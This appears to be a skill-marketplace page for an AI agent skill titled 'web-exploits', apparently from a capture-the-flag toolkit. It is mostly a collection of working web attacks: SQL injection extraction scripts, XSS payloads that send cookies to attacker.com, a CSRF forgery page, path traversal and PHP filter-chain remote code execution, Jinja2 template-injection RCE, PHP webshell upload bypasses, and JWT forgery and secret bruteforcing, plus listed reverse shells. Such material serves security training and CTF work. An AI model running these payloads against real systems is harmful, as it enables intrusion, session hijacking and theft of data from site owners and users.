web-exploits

📁 g36maid/ctf-arsenal 📅 4 days ago

总安装量

周安装量

#32290

全站排名

安装命令

npx skills add https://github.com/g36maid/ctf-arsenal --skill web-exploits

Agent 安装分布

codex 5

gemini-cli 5

amp 4

opencode 4

kimi-cli 4

Skill 文档

Web Exploitation Patterns

When to Use

Load this skill when:

Testing web applications for vulnerabilities
Exploiting SQL injection, XSS, or CSRF
Bypassing file upload restrictions
Testing for LFI/RFI (Local/Remote File Inclusion)
Exploiting SSTI (Server-Side Template Injection)
Manipulating JWT tokens
Analyzing web traffic with Burp Suite

SQL Injection

Detection and Exploitation

import requests

# Test for SQL injection
payloads = [
    "'",
    "' OR '1'='1",
    "' OR '1'='1'--",
    "' OR '1'='1' /*",
    "admin' --",
    "admin' #",
    "' UNION SELECT NULL--",
]

for payload in payloads:
    response = requests.post(url, data={'username': payload, 'password': 'test'})
    if "error" in response.text or "mysql" in response.text.lower():
        print(f"[!] Vulnerable to: {payload}")

Union-Based SQLi

# Step 1: Find number of columns
for i in range(1, 20):
    payload = f"' UNION SELECT {','.join(['NULL']*i)}--"
    response = requests.get(f"{url}?id={payload}")
    if "error" not in response.text:
        print(f"[+] Number of columns: {i}")
        break

# Step 2: Extract data
payloads = [
    "' UNION SELECT 1,version(),3--",
    "' UNION SELECT 1,database(),3--",
    "' UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema=database()--",
    "' UNION SELECT 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_name='users'--",
    "' UNION SELECT 1,group_concat(username,0x3a,password),3 FROM users--",
]

Blind SQLi

# Time-based blind SQLi
import time

def time_based_sqli(url, param):
    """Check if parameter is vulnerable to time-based SQLi"""
    payload = f"' AND SLEEP(5)--"
    start = time.time()
    response = requests.get(f"{url}?{param}={payload}")
    elapsed = time.time() - start
    
    if elapsed >= 5:
        print(f"[+] Time-based SQLi confirmed on {param}")
        return True
    return False

# Boolean-based blind SQLi
def boolean_based_sqli(url):
    """Extract data character by character"""
    result = ""
    for i in range(1, 100):  # Max 100 characters
        for c in range(32, 127):  # ASCII printable
            payload = f"' AND ASCII(SUBSTRING(database(),{i},1))={c}--"
            response = requests.get(f"{url}?id={payload}")
            if "Welcome" in response.text:  # Success indicator
                result += chr(c)
                print(f"[+] Found: {result}")
                break
        else:
            break
    return result

Cross-Site Scripting (XSS)

Reflected XSS

// Basic payloads
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<iframe src="javascript:alert(1)">

// Bypass filters
<scr<script>ipt>alert(1)</scr</script>ipt>
<img src=x onerror="alert(String.fromCharCode(88,83,83))">
<svg/onload=alert(1)>

// Extract cookies
<script>fetch('http://attacker.com/?c='+document.cookie)</script>
<img src=x onerror="location='http://attacker.com/?c='+document.cookie">

Stored XSS

import requests

# Test stored XSS
xss_payloads = [
    "<script>alert(1)</script>",
    "<img src=x onerror=alert(1)>",
    "<svg onload=alert(1)>",
    '"><script>alert(1)</script>',
    "';alert(1);//",
]

for payload in xss_payloads:
    # Submit payload
    requests.post(url + "/comment", data={'text': payload})
    
    # Check if executed
    response = requests.get(url + "/comments")
    if payload in response.text:
        print(f"[+] Stored XSS: {payload}")

CSRF (Cross-Site Request Forgery)

<!-- CSRF PoC for form submission -->
<html>
  <body>
    <form action="https://target.com/change_password" method="POST">
      <input type="hidden" name="new_password" value="hacked123" />
      <input type="hidden" name="confirm_password" value="hacked123" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

# Test CSRF protection
import requests

session = requests.Session()

# Login first
session.post(url + "/login", data={'user': 'admin', 'pass': 'admin'})

# Try action without token
response = session.post(url + "/delete_user", data={'id': '1'})

if response.status_code == 200:
    print("[!] No CSRF protection!")

Local File Inclusion (LFI)

Path Traversal

# Common LFI payloads
lfi_payloads = [
    "../../../../../etc/passwd",
    "....//....//....//....//etc/passwd",
    "..%2F..%2F..%2F..%2Fetc%2Fpasswd",
    "....\/....\/....\/....\/etc\/passwd",
    "/etc/passwd",
    "php://filter/convert.base64-encode/resource=index.php",
    "expect://whoami",
    "data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7",
]

for payload in lfi_payloads:
    response = requests.get(f"{url}?page={payload}")
    if "root:" in response.text or "<?php" in response.text:
        print(f"[+] LFI found: {payload}")

PHP Filter Chain (RCE)

# Use php://filter to achieve RCE
filter_chain = "php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|"
filter_chain += "convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16|"
# ... (full chain truncated for brevity)
filter_chain += "resource=data://,<?php system($_GET['cmd']); ?>"

response = requests.get(f"{url}?page={filter_chain}&cmd=whoami")

Server-Side Template Injection (SSTI)

Detection

# Test payloads for common template engines
ssti_tests = {
    'Jinja2': "{{7*7}}",  # Python (Flask)
    'Twig': "{{7*7}}",    # PHP
    'ERB': "<%= 7*7 %>",  # Ruby
    'Smarty': "{7*7}",    # PHP
    'Velocity': "#set($x=7*7)$x",  # Java
}

for engine, payload in ssti_tests.items():
    response = requests.get(f"{url}?name={payload}")
    if "49" in response.text:
        print(f"[+] {engine} SSTI detected!")

Jinja2 Exploitation

# Read file
payload = "{{ ''.__class__.__mro__[1].__subclasses__()[40]('/etc/passwd').read() }}"

# RCE (Python 2)
payload = "{{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evil.sh', 'w').write('#!/bin/bash\\nid') }}"

# RCE (Python 3)
payload = "{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}"

File Upload Bypass

Extension Bypass

# Test various extensions
extensions = [
    'php', 'php3', 'php4', 'php5', 'phtml', 'pht',
    'php.jpg', 'php.png', 'php;.jpg',
    'php%00.jpg',  # Null byte injection
]

for ext in extensions:
    filename = f"shell.{ext}"
    files = {'file': (filename, "<?php system($_GET['cmd']); ?>", 'application/x-php')}
    response = requests.post(url + "/upload", files=files)
    
    if response.status_code == 200:
        print(f"[+] Uploaded: {filename}")

Content-Type Bypass

# Try different MIME types
content_types = [
    'image/jpeg',
    'image/png',
    'image/gif',
    'application/octet-stream',
]

for ctype in content_types:
    files = {'file': ('shell.php', "<?php system($_GET['cmd']); ?>", ctype)}
    response = requests.post(url + "/upload", files=files)

Magic Bytes Bypass

# Add GIF header to bypass file type checks
content = b"GIF89a" + b"<?php system($_GET['cmd']); ?>"
files = {'file': ('shell.php', content, 'image/gif')}
response = requests.post(url + "/upload", files=files)

JWT Token Manipulation

import jwt
import base64

# Decode JWT
token = "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9..."
decoded = jwt.decode(token, options={"verify_signature": False})
print(decoded)

# None algorithm attack
header = base64.b64encode(b'{"typ":"JWT","alg":"none"}').strip(b'=')
payload = base64.b64encode(b'{"user":"admin"}').strip(b'=')
forged_token = header + b'.' + payload + b'.'

# Weak secret bruteforce
import hashlib
with open('wordlists/common.txt') as f:
    for secret in f:
        secret = secret.strip()
        try:
            jwt.decode(token, secret, algorithms=['HS256'])
            print(f"[+] Found secret: {secret}")
            break
        except:
            continue

Quick Reference

Vulnerability	Detection Pattern	Exploitation
SQL Injection	`'`, `' OR 1=1--`	`' UNION SELECT ...`
XSS	`<script>alert(1)</script>`	Cookie stealing, session hijacking
LFI	`../../../etc/passwd`	Read sensitive files, RCE via log poisoning
SSTI	`{{77}}`, `${77}`	RCE via template engine
File Upload	Upload `.php`, `.phtml`	Web shell execution
CSRF	No token validation	Force user actions
JWT	`alg: none`, weak secret	Privilege escalation

Bundled Resources

Scripts

scripts/csrf_grabber.py – Extract CSRF tokens automatically
scripts/jwt_tamper.py – JWT token manipulation tool
scripts/lfi_tester.py – Automated LFI testing
scripts/ssti_tester.py – SSTI detection and exploitation
scripts/upload_tester.py – File upload bypass testing

Payloads

payloads/sqli_basic.txt – Basic SQL injection payloads
payloads/sqli_mysql.txt – MySQL-specific payloads
payloads/xss_reflected.txt – XSS test vectors
payloads/ssti_jinja2.txt – Jinja2 SSTI payloads
payloads/cmd_injection.txt – Command injection patterns
payloads/lfi.txt – LFI/path traversal payloads
payloads/ssrf.txt – SSRF test URLs
payloads/file_upload_bypass.txt – Extension bypass techniques

Webshells

webshells/php_reverse.php – PHP reverse shell
webshells/aspx_cmd.aspx – ASPX command shell
webshells/jsp_cmd.jsp – JSP command shell
webshells/node_cmd.js – Node.js shell

Templates

templates/web_requests.py – Python requests template with session handling

Wordlists

wordlists/ – Common username/password lists (from SecLists)

Keywords

web exploitation, SQL injection, SQLi, XSS, cross-site scripting, CSRF, LFI, RFI, local file inclusion, SSTI, template injection, file upload, webshell, JWT, JSON web token, command injection, path traversal, directory traversal, web security, OWASP, burp suite, requests, beautifulsoup

GitHub 仓库 ↗ ← 返回陌讯 Skills 聚合平台